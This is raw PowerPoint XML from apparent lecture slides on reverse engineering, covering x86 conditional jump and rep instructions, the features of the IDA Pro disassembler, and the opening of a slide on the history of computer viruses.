            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a sequence of code that is conditionally executed depending on the flow of the program, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>versions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372865757"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323528" y="2636912"/>
          <a:ext cx="3960440" cy="4053840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535124"/>
                <a:gridCol w="2425316"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jz</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jnz</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jne</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jg</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jge</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ja</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jae</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jl</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endParaRPr lang="en-GB" sz="1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50250436"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4716016" y="2636912"/>
          <a:ext cx="3960440" cy="3931920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535124"/>
                <a:gridCol w="2425316"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jle</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jb</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jbe</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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jo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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="240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endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jecxz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>loc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30435789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b="1" dirty="0" smtClean="0"/>
              <a:t>Rep</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54958334"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1907704" y="2060848"/>
          <a:ext cx="3960440" cy="1828800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535124"/>
                <a:gridCol w="2425316"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rep</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503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Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>or ZF = 0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repnz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503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Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2728745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C Main Method and Offsets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526" y="1916832"/>
            <a:ext cx="7539624" cy="2378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791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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Professional disassembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDA Pro Free and license</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>disassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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501008"/>
            <a:ext cx="5786558" cy="2656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52308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dirty="0" smtClean="0"/>
              <a:t>disassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Text – mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>GUI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Others</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: list of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Imports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Exports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Structures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: list of data structures executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5340748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navigating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Next Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Sequence of Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162146124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smtClean="0"/>
              <a:t>Cross references - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Xrefs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Xrefs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Xrefs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Analyse and stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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428999"/>
            <a:ext cx="8280761"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4084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Graph</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>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268760"/>
            <a:ext cx="2133466" cy="426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348881"/>
            <a:ext cx="8475654" cy="3651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087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Computer Virus &amp; Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1949, John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>von Neumann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Theory and Organization of Complicated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Automata” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1971, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Creeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(Bob Thomas at BBN Technologies) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>able to move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>between computers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
